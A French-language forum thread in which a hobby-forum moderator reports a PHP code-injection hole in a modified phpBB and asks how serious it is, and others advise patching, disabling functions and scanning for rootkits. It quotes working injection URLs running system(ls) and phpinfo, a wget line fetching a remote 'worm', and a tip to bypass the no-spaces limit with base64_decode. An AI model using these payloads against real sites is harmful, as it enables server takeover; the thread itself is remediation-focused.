Discussion :

[LeLapinVengeur]

Bonjour,


Pour vous placer rapidement le contexte, je suis passé modérateur sur un forum qui parle modélisme.

Développeur C# de métier, je me suis un peu intéressé au forum en question qui n'est plus maintenu depuis un moment.

Le problème est que j'ai trouvé une faille d'injection de code php.
En injectant le code php comme ceci je vois le listing des fichiers dans le répertoire courant:
http://blabbla.fr?ref=dsqds567dsq'{${system(ls)}}
comme ceci je vois tous les infos php
http://blabbla.fr?ref=dsqds567dsq'{${phpinfo(INFO_ALL)}}

Jusque là ce n'est pas trop grave je pense puisque je n'arrive pas à placer des espaces.
http://blabbla.fr?ref=dsqds567dsq'{${system(ls /etc/)}}
http://blabbla.fr?ref=dsqds567dsq'{${system(ls%20/etc/)}}
ne fonctionnent pas.

C'est là ou je demande votre aide, est-ce grave en l'état? Quelles commandes pourrait être dangereuse?
j'ai vu sur le net que beaucoup font des
http://blabbla.fr?ref=dsqds567dsq'{${system(wget%20http://monworm)}}
Il y a-t-il un moyen que je connais pas pour que l'espace soit correctement reconnu ?


J'y connais rien en PHP, je vous demande votre avis, ca m'éviterai de me plonger dans ce code pour corriger ca.


Merci d'avance!

[sabotage]

Plutot qu'un problème d'espace, j'espere que c'est un problème de droits.
Enfin pouvoir lister des fichiers c'est déjà assez catastrophique je trouve. Quel forum moisi permet ça ?

[LeLapinVengeur]

Tu comprendras que je ne préfère pas divulguer l'adresse du forum avant d'avoir corriger le problème.

Le forum c'est un phpBB traficoté sinon.

[sabotage]

Je parlais du moteur de forum, pas du site
soit c'est une très vieille version de PHPbb soit il a été mochement trafiqué effectivement.

[Tsilefy]

Je m'étonne quand même qu'une version même ancienne de phpBB permette ce genre d'injection.

Regarde s'il y a des correctifs pour cette version de phpBB. S'il n'y en a pas, ou si le forum est trop modifié pour que tu puisses les appliquer (*), tu es mal. Dans ce cas, si tu es dans un serveur dédié ou un VPS il y a peut-être des palliatifs (qui ne corrigeront pas la totalité du problème). Mais si en plus tu es sur un mutualisé sans possibilité de modifier la configuration de PHP ou d'installer un module apache, je ne vois pas de solution.

Ou alors installe une version plus récente de phpBB...


(*) À tous les débutants (et non-débutants): NE JAMAIS MODIFIER LE CORE D'UNE APPLICATION! Passez toujours par un plugin, module, extension, bibliothèque, etc...

Et si ça se trouve ton site est déjà compromis depuis des années :-(

[LeLapinVengeur]

On a un serveur dédié.

Concernant la faille elle se trouve sur un bout de code php permettant de lire une video youtube. Aucune idée si il s'agit d'un bidouillage, d'un plugin, ou d'une fonction native phpBB.

N'y connaissant rien et ne connaissant pas l'impacte du bidouillage, je vais dans un premier temps récupéré tous ca sur un autre poste, et tester la MAJ phpBB.


Sinon, j'ai testé a peu près toutes les commandes que j'ai pu trouver ici : http://doc.ubuntu-fr.org/tutoriel/co...mandes_de_base
Si pas possibilité d'insérer des espaces, la marche de manoeuvre est quand meme limité je trouve.

[sabotage]

Pouvoir supprimer ou modifier les fichiers je trouve ça déjà pas mal non ?

De toute façon, je ne vois pas trop ce qui justifie l'utilisation d'eval (puisqu'il doit s'agir de ça).
Est-ce que ton forum ne serait pas déjà compromis par un code malveillant placé là ?

Comment t'es venu l'idée de tester une syntaxe pareille ?

[LeLapinVengeur]

Je ne sais pas supprimer ou modifier des fichiers ! En tout cas je ne vois pas comment faire si je ne peut pas utiliser d'espace.


Concernant la syntaxe, on a au boulot un outil qui s'appelle Burp. Par curiosité je l'ai passé sur le forum

[sabotage]

Trouve le code qui utilise la fonction eval() et on verra mieux pourquoi elle a pu être utilisée.

[LeLapinVengeur]

Ok merci, je vais regarder cà !

[LeLapinVengeur]

Si quelqu'un rencontrait le même souci et pour répondre à une de mes questions.

Un mec chez un de mes clients m'a dit que les espaces n'étaient pas un problème.

Il suffit de tout encoder en base 64 et de placer la chaîne dans la fonction base64_dec.

Je regarde le code ce week end, je pense que la fonction est peu utilisée. Si c'est bien le cas, ça sera poubelle.

[Tsilefy]

Si tu arrives à injecter "system" avec succès, c'est extrêmement grave. Ça veut dire que tout est permis. Une solution de secours pour corriger temporairement le problème serait d'utiliser la directive disable_functions dans le php.ini pour bloquer les fonctions listées ici.

Bien évidemment, si le serveur est compromis, ça n'ira pas. Scanne ton serveur avec un détecteur de rootkit et autres malwares. Change tous les mots de passes / clés du serveur, et les mots de passes admin du forum.

Fais un find/grep pour trouver les fichiers ayant pour contenu base64_encode ou eval.

[LeLapinVengeur]

Merci beaucoup pour ces précisions !


Vous me conseillez quoi comme détecteur de rootkit/malware?

[Tsilefy]

Rootkit hunter et chkrootkit sont les 2 que nous utilisons.

Tu trouveras d'autres détecteurs de rootkit également sur cette page.